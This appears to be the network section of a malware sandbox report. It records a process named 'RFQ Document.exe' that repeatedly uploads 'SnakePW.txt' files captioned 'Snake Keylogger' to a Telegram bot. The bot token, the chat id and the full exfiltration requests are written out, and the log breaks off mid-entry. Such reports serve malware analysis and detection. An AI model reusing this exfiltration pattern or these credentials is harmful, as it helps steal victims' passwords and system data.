2021-09-28 05:59:46 UTC	456	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:46 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:46 UTC	456	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12875,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
287	192.168.2.4	50124	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:46 UTC	457	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f5032b33 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:46 UTC	457	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 30 33 32 62 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f5032b33Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:46 UTC	457	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:46 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:46 UTC	458	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12876,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
288	192.168.2.4	50125	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:46 UTC	458	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f51b008b Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:46 UTC	459	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 31 62 30 30 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f51b008bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:46 UTC	459	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:46 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:46 UTC	459	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12877,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
289	192.168.2.4	50126	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:46 UTC	460	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f539ff42 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:46 UTC	460	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 33 39 66 66 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f539ff42Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:46 UTC	461	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:46 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:46 UTC	461	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12878,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808786,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49803	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:26 UTC	46	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c5542ea6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:26 UTC	46	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 35 34 32 65 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c5542ea6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:26 UTC	46	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:26 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:26 UTC	47	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12609,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808706,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
290	192.168.2.4	50127	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:47 UTC	462	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f54f76ba Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:47 UTC	462	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 34 66 37 36 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f54f76baContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:47 UTC	462	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:47 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:47 UTC	463	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12879,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808787,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
291	192.168.2.4	50128	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:47 UTC	463	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f5674ca3 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:47 UTC	463	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 36 37 34 63 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f5674ca3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:47 UTC	464	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:47 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:47 UTC	464	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12880,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808787,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
292	192.168.2.4	50129	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:47 UTC	465	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f57f2362 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:47 UTC	465	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 35 37 66 32 33 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f57f2362Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:47 UTC	465	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:47 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:47 UTC	466	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 37 2c 22 64 Data Ascii: 